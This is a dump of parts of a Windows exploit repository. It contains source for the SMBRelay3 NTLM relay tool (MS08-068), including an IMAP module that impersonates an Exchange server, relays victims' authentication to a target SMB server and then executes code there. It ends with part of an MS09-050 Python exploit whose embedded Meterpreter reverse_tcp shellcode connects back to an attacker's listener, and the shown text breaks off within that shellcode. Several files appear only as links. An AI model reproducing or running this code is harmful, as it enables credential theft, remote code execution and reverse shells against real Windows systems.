https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-067/MS08-067.exe -------------------------------------------------------------------------------- /MS08-067/MS08-067_2K3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-067/MS08-067_2K3.exe -------------------------------------------------------------------------------- /MS08-068/Disable_Port_445.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 4 | "TransportBindName"="" 5 | -------------------------------------------------------------------------------- /MS08-068/Enable_Port_445.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 4 | "TransportBindName"="\\Device\\" 5 | -------------------------------------------------------------------------------- /MS08-068/libeay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/libeay32.dll -------------------------------------------------------------------------------- /MS08-068/smbrelay3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/smbrelay3.exe -------------------------------------------------------------------------------- /MS08-068/smrs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/smrs.exe -------------------------------------------------------------------------------- /MS08-068/src/httprelay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/httprelay.cpp -------------------------------------------------------------------------------- /MS08-068/src/httprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _HTTPRELAY_H_ 2 | #define _HTTPRELAY_H_ 3 | 4 | #include "smbrelay.h" 5 | 6 | //HTTP Functions 7 | int HandleIncommingHTTPRequest(RELAY *relay, char *destinationhostname, int destinationport); 8 | int ReadRequest(RELAY *relay, char *request, int requestsize); 9 | char **ParseHeaders(char *lpBuffer, unsigned int *nheaders); 10 | char *GetHeaderValue(char **header, int nheaders, char *Header) ; 11 | 12 | #endif 13 | 14 | 15 | -------------------------------------------------------------------------------- /MS08-068/src/imaprelay.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | SMBRelay3 - IMAP REPLAY ATTACK MODULE 3 | ------------------------------------- 4 | 5 | 6 | */ 7 | 8 | 9 | #include "imaprelay.h" 10 | #include "payload.h" 11 | 12 | extern int verbose; 13 | 14 | int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname, int destinationport) 15 | { 16 | char buffer[4096]; 17 | char buf[4096]; 18 | char buf1[4096]; 19 | char buf2[4096]; 20 | 21 | char CurrentUserName[256]; 22 | char CurrentDomain[256]; 23 | char CurrentWorkstation[256]; 24 | smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol; 25 | tSmbNtlmAuthRequest *request; 26 | 27 | uint16 packetlen; 28 | int i; 29 | char *p; 30 | char opt[5]; 31 | const char WelcomeMessage[]= "* OK Microsoft Exchange Server 2007 IMAP4 service ready\r\n"; 32 | 33 | // #define ERROR "-ERR The specified authentication package is not supported.\r\n" 34 | //#define CAPA "* CAPABILITY IMAP4 IMAP4rev1 IDLE LITERAL+ AUTH=NTLM\r\n0000 OK CAPABILITY completed.\r\n" 35 | 36 | 37 | //#define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n" 38 | #define AUTHOK "0001 OK AUTHENTICATE NTLM completed.\r\n" 39 | #define AUTHERROR "0001 ERROR AUTHENTICATE NTLM Failed.\r\n" 40 | 41 | 42 | printf("[+] Sending IMAP Banner\n"); 43 | i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT); 44 | if (i<=0){ 45 | printf("Error Reading IMAP Client message\n"); 46 | return(0); 47 | } 48 | 49 | if (memcmp(buffer+4," CAPABILITY",11)==0) { 50 | printf("[+] CAPABILITY Request from client\n"); 51 | memcpy(opt,buffer,4); opt[4]='\0'; 52 | sprintf(buffer,"* CAPABILITY IMAP4 IMAP4rev1 IDLE LITERAL+ AUTH=NTLM\r\n%s OK CAPABILITY completed.\r\n",opt); 53 | i=SendBytesAndWaitForResponse(relay->source,buffer, strlen(buffer), buffer,sizeof(buffer),SMBWAITTIMEOUT); 54 | if (i<=0) return(0); 55 | buffer[i]='\0'; 56 | } 57 | 58 | 59 | if (memcmp(buffer+4," AUTHENTICATE NTLM",18)!=0) { 60 | printf("[-] Not supported option %s received\n",buffer); 61 | i=SendBytesAndWaitForResponse(relay->source,(char*)AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT); 62 | return(0); 63 | } 64 | if (strlen(buffer)>24){ 65 | printf("[+] received AUTH NTLM message\n"); 66 | memset((char*)&buf1,'\0',sizeof(buf1)); 67 | packetlen=from64tobits(buf1, buffer+22); 68 | request=(tSmbNtlmAuthRequest *)buf1; 69 | dumpAuthRequest(0,request); 70 | } else { 71 | memset(buffer,'\0',sizeof(buffer)); 72 | i=SendBytesAndWaitForResponse(relay->source,"+\r\n", 3, buffer,sizeof(buffer),SMBWAITTIMEOUT); 73 | if (i<=0){ 74 | printf("[-] Error Auth response with NTLM type1 packet\n"); 75 | return(0); 76 | } 77 | buffer[i]='\0'; 78 | printf("[+] received AUTH NTLM message\n"); 79 | memset((char*)&buf1,'\0',sizeof(buf1)); 80 | packetlen=from64tobits(buf1, buffer); 81 | request=(tSmbNtlmAuthRequest *)buf1; 82 | 83 | if (debug) { 84 | printf("[+] received AUTH NTLM message: %s\n",buffer); 85 | DumpMem(buf1,packetlen); 86 | dumpAuthRequest(0,request); 87 | } 88 | } 89 | 90 | 91 | //Init Replay Attack 92 | i=ConnectToRemoteHost(relay,destinationhostname,destinationport); 93 | if (!i) { 94 | printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport); 95 | return(0); 96 | } 97 | printf("[+] Sending SMB Protocol Authentication Handshake\n"); 98 | p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i); 99 | p = AddDialect(p,"LANMAN1.0", 0x02,&i); 100 | p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i); 101 | p = AddDialect(p,"LM1.2X002", 0x02,&i); 102 | p = AddDialect(p,"LANMAN2.1", 0x02,&i); 103 | p = AddDialect(p,"NT LM 0.12", 0x02,&i); 104 | NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i); 105 | free(p); 106 | i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT); 107 | free(NegotiateProtocol); 108 | if (i<=0){ 109 | printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n"); 110 | return(0); 111 | } 112 | 113 | SmbPacket1=BuildSmbPacket1(); 114 | if (debug) { 115 | printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n"); 116 | DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1)); 117 | } 118 | 119 | SmbPacket2=GetSmbPacket2(relay,SmbPacket1); 120 | if (SmbPacket2==NULL) { 121 | printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n"); 122 | return(0); 123 | } 124 | printf("[+] Received SMB Message with NTLM message type 2 packet\n"); 125 | memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2); 126 | 127 | if (debug) { 128 | printf("[*] SMB Packet Dump:\n"); 129 | DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2)); 130 | printf("[*] NTLM Challenge packet from SMB message\n"); 131 | DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen); 132 | dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2)); 133 | } 134 | 135 | ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207; 136 | memset(buf1,'\0',sizeof(buf1)); 137 | to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen); 138 | sprintf(buf,"+ %s\r\n",buf1); 139 | 140 | printf("[+] Replaying NTLM Challenge from SMB Server to the IMAP Client\n"); 141 | if (debug) 142 | { 143 | printf("[+] Sending SMTP Response: %s\n",buf); 144 | } 145 | i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT); 146 | if (i<=0) 147 | { 148 | printf("[-] Unable to read NTLM packet 3 from IMAP client\n"); 149 | return(0); 150 | } 151 | buffer[i]='\0'; 152 | 153 | if (debug) printf("[*] Response: %s\n",buffer); 154 | memset((char*)buf1,'\0',sizeof(buf1)); 155 | packetlen=from64tobits(buf1, buffer); 156 | if (debug) { 157 | 158 | printf("[*] Raw authorization packet (len: %i)\n",packetlen); 159 | DumpMem(buf1,packetlen); 160 | dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1); 161 | } 162 | 163 | 164 | GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose); 165 | printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName); 166 | buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1); 167 | SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2)); 168 | 169 | 170 | printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n"); 171 | if (debug) 172 | { 173 | DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3)); 174 | } 175 | 176 | i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT); 177 | if (i<=0){ 178 | printf("[-] Error reading Server Authentication Response\n"); 179 | i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT); 180 | return(0); 181 | } 182 | if (debug) { 183 | printf("[*] SessionSetupAndX Completed - Dumping received packet\n"); 184 | DumpMem(buf,i); 185 | } 186 | 187 | if (((smheader*)buf)->NtStatus!=0x00000000) { 188 | printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n"); 189 | i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT); 190 | return(0); 191 | } 192 | if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 ) 193 | { 194 | printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n"); 195 | i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT); 196 | 197 | return(0); 198 | } 199 | 200 | //WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData); 201 | 202 | printf("[+] SessionSetupAndX Completed \n"); 203 | printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName); 204 | i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT); 205 | ExecuteCode( *relay); 206 | 207 | return(1); 208 | 209 | } 210 | -------------------------------------------------------------------------------- /MS08-068/src/imaprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _IMAP_RELAY_ 2 | #define _IMAP_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingIMAPRequest(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS08-068/src/misc.h: -------------------------------------------------------------------------------- 1 | /* 2 | Misc data manipulation functions for Smbrelay 3 | Andres Tarasco 4 | */ 5 | #ifndef _MISC_FUNCTIONS_H_ 6 | #define _MISC_FUNCTIONS_H_ 7 | #define _CRT_SECURE_NO_DEPRECATE 8 | 9 | #include 10 | 11 | 12 | #pragma pack(1) 13 | #ifdef WIN32 14 | #include 15 | #include 16 | #else 17 | #pragma align 1 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include //pthread 26 | #include //toupper 27 | #include 28 | #include 29 | #define SOCKET int 30 | #define _strnicmp strncasecmp 31 | #define closesocket close 32 | #define Sleep(a) sleep(a/1000) 33 | #define INVALID_SOCKET -1 34 | #endif 35 | //#include "smbrelay.h" 36 | #include "ntlm.h" 37 | 38 | typedef struct 39 | { 40 | SOCKET source; 41 | struct sockaddr_in sourceaddr; 42 | 43 | SOCKET destination; 44 | struct sockaddr_in destinationaddr; 45 | 46 | int dstProtocol; 47 | char hostname[256]; 48 | } RELAY; 49 | 50 | #define CONNECT_TIMEOUT 10 51 | #define SMBWAITTIMEOUT 5 52 | #define DBG_DUMP_ROWS 16 53 | 54 | 55 | void DumpMem(void* string, int length) ; 56 | char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile); 57 | 58 | int ConnectToRemoteHost(RELAY *relay,char *hostname, int port); 59 | //int SendBytesAndWaitForResponse(RELAY *relay,char *source, int nBytes, char *destination, int MaxReadSize,int timeout); 60 | int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout); 61 | void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge); 62 | void CleanLine(int verbose); 63 | void usage(void); 64 | void Banner(void); 65 | 66 | #endif 67 | 68 | -------------------------------------------------------------------------------- /MS08-068/src/ntlm.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/ntlm.cpp -------------------------------------------------------------------------------- /MS08-068/src/ntlm.h: -------------------------------------------------------------------------------- 1 | #ifndef _NTLMER_H_ 2 | #define _NTLMER_H_ 3 | /* $Id$ 4 | Single file NTLM system to create and parse authentication messages. 5 | 6 | http://www.reversing.org 7 | ilo-- ilo@reversing.org 8 | 9 | I did copy&paste&modify several files to leave independent NTLM code 10 | that compile in cygwin/linux environment. Most of the code was ripped 11 | from Samba implementation so I left the Copying statement. Samba core 12 | code was left unmodified from 1.9 version. 13 | 14 | Also libntlm was ripped but rewrote, due to fixed and useless interface. 15 | Copyright and licensing information is in ntlm.c file. 16 | 17 | NTLM Interface, just two functions: 18 | 19 | void BuildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain); 20 | if flags is 0 minimun security level is selected, otherwise new value superseeds. 21 | host and domain are optional, they may be NULLed. 22 | 23 | void buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse *response, long flags, char *user, char *password, char *domain, char *host); 24 | Given a challenge, generates a response for that user/passwd/host/domain. 25 | flags, host, and domain superseeds given by server. Leave 0 and NULL for server authentication 26 | 27 | 28 | This is an usage sample: 29 | 30 | 31 | ... 32 | //beware of fixed sized buffer, asserts may fail, don't use long strings :) 33 | //Yes, I Know, year 2k6 and still with this shit.. 34 | unsigned char buf[4096]; 35 | unsigned char buf2[4096]; 36 | 37 | //send auth request: let the server send it's own hostname and domainname 38 | buildAuthRequest((tSmbNtlmAuthRequest*)buf2,0,NULL,NULL); 39 | to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthResponse*)buf2)); 40 | send_to_server(buf); 41 | 42 | //receive challenge 43 | receive_from_server(buf); 44 | 45 | //build response with hostname and domainname from server 46 | buildAuthResponse((tSmbNtlmAuthChallenge*)buf,(tSmbNtlmAuthResponse*)buf2,0,"username","password",NULL,NULL); 47 | to64frombits(buf, buf2, SmbLength((tSmbNtlmAuthResponse*)buf2)); 48 | send_to_server(buf); 49 | 50 | //get reply and Check if ok 51 | ... 52 | 53 | 54 | included bonus!!: 55 | Base64 code 56 | int from64tobits(char *out, const char *in); 57 | void to64frombits(unsigned char *out, const unsigned char *in, int inlen); 58 | 59 | 60 | 61 | 62 | You don't need to read the rest of the file. 63 | */ 64 | 65 | 66 | /* 67 | * These structures are byte-order dependant, and should not 68 | * be manipulated except by the use of the routines provided 69 | */ 70 | 71 | #pragma pack(1) 72 | #ifdef WIN32 73 | #else 74 | #pragma align 1 75 | #endif 76 | 77 | 78 | #include 79 | #include 80 | #include 81 | #include 82 | 83 | #include 84 | 85 | 86 | 87 | #ifdef WIN32 88 | #else 89 | #include 90 | #define _strdup strdup 91 | #endif 92 | 93 | 94 | // 95 | typedef unsigned short uint16; 96 | typedef unsigned int uint32; 97 | typedef unsigned long long int uint64; 98 | typedef unsigned char uint8; 99 | 100 | 101 | 102 | #define SERVERNAMEITEM 0x01 103 | #define DOMAINNAMEITEM 0x02 104 | #define DNSITEM 0x03 105 | #define FQDNITEM 0x04 106 | 107 | typedef struct 108 | { 109 | uint16 ItemType; 110 | uint16 ItemLength; 111 | uint8 buffer[256]; 112 | }tSmbStrItem; //Challenge (NTLM type 2) 113 | 114 | typedef struct 115 | { 116 | uint8 HMAC[16]; 117 | uint32 Header; 118 | uint32 Reserved; 119 | uint8 Filetime[8]; 120 | uint8 ClientChallenge[8]; 121 | uint32 Unknown; 122 | tSmbStrItem DomainName; 123 | } NtlmV2Packet; 124 | 125 | typedef struct 126 | { 127 | uint16 len; 128 | uint16 maxlen; 129 | uint32 offset; 130 | }tSmbStrHeader; 131 | 132 | typedef struct 133 | { 134 | char ident[8]; 135 | uint32 msgType; 136 | uint32 flags; 137 | tSmbStrHeader host; 138 | tSmbStrHeader domain; 139 | uint8 buffer[1024]; 140 | uint32 bufIndex; 141 | }tSmbNtlmAuthRequest; 142 | 143 | typedef struct 144 | { 145 | char ident[8]; 146 | uint32 msgType; 147 | tSmbStrHeader uDomain; 148 | uint32 flags; 149 | uint8 challengeData[8]; 150 | uint8 reserved[8]; 151 | tSmbStrHeader emptyString; 152 | uint8 buffer[16384]; 153 | //uint32 bufIndex; 154 | }tSmbNtlmAuthChallenge; 155 | 156 | 157 | 158 | typedef struct 159 | { 160 | char ident[8]; 161 | uint32 msgType; 162 | tSmbStrHeader lmResponse; 163 | tSmbStrHeader ntResponse; 164 | tSmbStrHeader uDomain; 165 | tSmbStrHeader uUser; 166 | tSmbStrHeader uWks; 167 | tSmbStrHeader sessionKey; 168 | uint32 flags; 169 | uint8 buffer[1024]; 170 | uint32 bufIndex; 171 | }tSmbNtlmAuthResponse; 172 | 173 | 174 | /* reversing interface */ 175 | /* ntlm functions */ 176 | void BuildAuthRequest(tSmbNtlmAuthRequest *request, long flags, char *host, char *domain); 177 | // if flags is 0 minimun security level is selected, otherwise new value superseeds. 178 | // host and domain are optional, they may be NULLed. 179 | 180 | void BuildAuthChallenge(tSmbNtlmAuthChallenge *pChallenge, char *DomainName, char *ServerName, char *DNS, char *FQDN, uint8 flags, uint8 *SpoofedChallenge); 181 | //All parameters are optional. IF DomainName is not set, the default name will be "SMBRELAY3" 182 | //if flags is 0 minimun security level is selected, otherwise new value superseeds. 183 | //if SpoofedChallenge is not set, the default Challenge value is 0x1122334455667788 184 | //That Challenge value allows bruteforce attacks with winrtgen built LM/ntlm tables 185 | 186 | void buildAuthResponse(tSmbNtlmAuthChallenge *challenge, tSmbNtlmAuthResponse *response, long flags, char *user, char *password, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3); 187 | //Given a challenge, generates a response for that user/passwd/host/domain. 188 | //flags, host, and domain superseeds given by server. Leave 0 and NULL for server authentication 189 | //Additional parameter OptionalNtlmPacket3 have been added to support relay attacks by changing challenge data 190 | 191 | 192 | 193 | 194 | //int NtlmChallengeSize(tSmbNtlmAuthChallenge *Challenge); 195 | //#define NtlmChallengeSize( (tSmbNtlmAuthChallenge *)Challenge) ( sizeof(tSmbNtlmAuthChallenge) - sizeof(Challenge->buffer) +Challenge->uDomain.maxlen + Challenge->emptyString.maxlen) 196 | #define NtlmChallengeSize(Challenge) ( sizeof(tSmbNtlmAuthChallenge) - sizeof(Challenge->buffer) +Challenge->uDomain.maxlen + Challenge->emptyString.maxlen) 197 | //#define NtlmAuth 198 | 199 | /*int NtlmChallengeSize(tSmbNtlmAuthChallenge *Challenge){ 200 | return( sizeof(tSmbNtlmAuthChallenge) - sizeof(Challenge->buffer) +Challenge->uDomain.maxlen + Challenge->emptyString.maxlen); 201 | } 202 | */ 203 | 204 | __inline void SetChallengeKey(tSmbNtlmAuthChallenge *challenge, uint8 *SpoofedChallenge); 205 | 206 | /* Base64 code*/ 207 | int from64tobits(char *out, const char *in); 208 | void to64frombits(unsigned char *out, const unsigned char *in, int inlen); 209 | 210 | // info functions 211 | void dumpAuthRequest(FILE *fp, tSmbNtlmAuthRequest *request); 212 | void dumpAuthChallenge(FILE *fp, tSmbNtlmAuthChallenge *challenge); 213 | void dumpAuthResponse(FILE *fp, tSmbNtlmAuthResponse *response); 214 | 215 | #define SmbLength(ptr) (((ptr)->buffer - (uint8*)(ptr)) + (ptr)->bufIndex) 216 | 217 | void GetNTLMPacketInfo(tSmbNtlmAuthResponse* NtlmAuthResponse, char* UserName, char *DomainName, char *WorkstationName, int verbose); 218 | 219 | void chartoWide(char *destination, char *source, int len); 220 | void Widetochar(char *destination, char *source, int len); 221 | 222 | #endif 223 | 224 | -------------------------------------------------------------------------------- /MS08-068/src/payload.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/payload.cpp -------------------------------------------------------------------------------- /MS08-068/src/payload.h: -------------------------------------------------------------------------------- 1 | #ifndef _PAYLOAD_ 2 | #define _PAYLOAD_ 3 | #include "smbrelay.h" 4 | #include "smb.h" 5 | #include "ntlm.h" 6 | 7 | void CleanLine(int verbose); 8 | smheader *BuildSmbPacket1(void); 9 | smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1); 10 | smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3); 11 | smheader *GetSmbPacket3Alt(smheader* SmbPacket2,char *lpUserName, char *lpPassword, char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3); 12 | 13 | int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName); 14 | char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter); 15 | int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath); 16 | 17 | 18 | #endif 19 | 20 | -------------------------------------------------------------------------------- /MS08-068/src/pop3relay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/pop3relay.cpp -------------------------------------------------------------------------------- /MS08-068/src/pop3relay.h: -------------------------------------------------------------------------------- 1 | #ifndef _POP3_RELAY_ 2 | #define _POP3_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS08-068/src/smb.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/smb.cpp -------------------------------------------------------------------------------- /MS08-068/src/smbrelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _SBMRELAY_H_ 2 | #define _SMBRELAY_H_ 3 | 4 | #define _CRT_SECURE_NO_DEPRECATE 5 | #include 6 | #ifdef WIN32 7 | #include 8 | #define socklen_t int 9 | #endif 10 | #include "misc.h" 11 | #include "smb.h" 12 | #include "ntlm.h" 13 | 14 | 15 | #define GetNTLMPacketFromSmbPacket(a) ((char*)a+0x2b+4) 16 | #define GetNTLMPacket3FromSmbPacket(a) ((char*)a+ sizeof(smheader) -sizeof(((smheader*)a)->buffer) +sizeof(SessionSetupAndX)) 17 | 18 | #define SmbPacketLen(a) (SREV(a->SmbMessageLength)+4) 19 | //#define PrintErrorMessage(a) printf("%s",a); return(0); 20 | //#define PrintErrorMessage(a) printf(a); return(0); 21 | 22 | #define ATTACK_NONE 0x00 23 | #define REPLAY_HTTP 0x01 24 | #define REPLAY_SMB 0x02 25 | #define REPLAY_POP3 0x03 26 | #define REPLAY_IMAP 0x04 27 | #define REPLAY_SMTP 0x05 28 | #define REPLAY_DNS 0x06 29 | #define REPLAY_TELNET 0x07 30 | #define REPLAY_MSSQL 0x08 31 | 32 | #define PSEXEC 0x10 33 | 34 | #define debug (verbose==2) 35 | 36 | 37 | 38 | //Functions 39 | //int InitSmbHandshake(RELAY *relay,char *Buffer, int BufferSize); 40 | int HandleIncommingSmbRequest(RELAY *relay, char *destinationhostname, int destinationport); 41 | 42 | int ReplayAttackAgainst(int Protocol,char *hostname, int port); 43 | int StablishNTLMSession(RELAY relay,char *host, char *lpUserName, char *lpPassword); 44 | int ExecuteCode( RELAY relay); 45 | 46 | 47 | 48 | 49 | #endif 50 | 51 | 52 | -------------------------------------------------------------------------------- /MS08-068/src/smbrelay3.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/smbrelay3.cpp -------------------------------------------------------------------------------- /MS08-068/src/smtprelay.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-068/src/smtprelay.cpp -------------------------------------------------------------------------------- /MS08-068/src/smtprelay.h: -------------------------------------------------------------------------------- 1 | #ifndef _SMTP_RELAY_ 2 | #define _SMTP_RELAY_ 3 | 4 | #include "smbrelay.h" 5 | 6 | int HandleIncommingSMTPRequest(RELAY *relay, char *destinationhostname,int destinationport); 7 | 8 | #endif 9 | 10 | -------------------------------------------------------------------------------- /MS09-050/40280.py: -------------------------------------------------------------------------------- 1 | # EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py 2 | 3 | #!/usr/bin/python 4 | #This module depends on the linux command line program smbclient. 5 | #I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python. 6 | #The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter. 7 | import tempfile 8 | import sys 9 | import subprocess 10 | from socket import socket 11 | from time import sleep 12 | from smb.SMBConnection import SMBConnection 13 | 14 | 15 | try: 16 | 17 | target = sys.argv[1] 18 | except IndexError: 19 | print '\nUsage: %s \n' % sys.argv[0] 20 | print 'Example: MS36299.py 192.168.1.1 1\n' 21 | sys.exit(-1) 22 | 23 | #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python 24 | shell = "" 25 | shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" #fce8820000006089e531c0648b 26 | shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" 27 | shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" 28 | shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" 29 | shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" 30 | shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" 31 | shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" 32 | shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" 33 | shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" 34 | shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" 35 | shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" 36 | shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" 37 | shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" 38 | shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01" 39 | shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" 40 | shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" 41 | shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" 42 | shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" 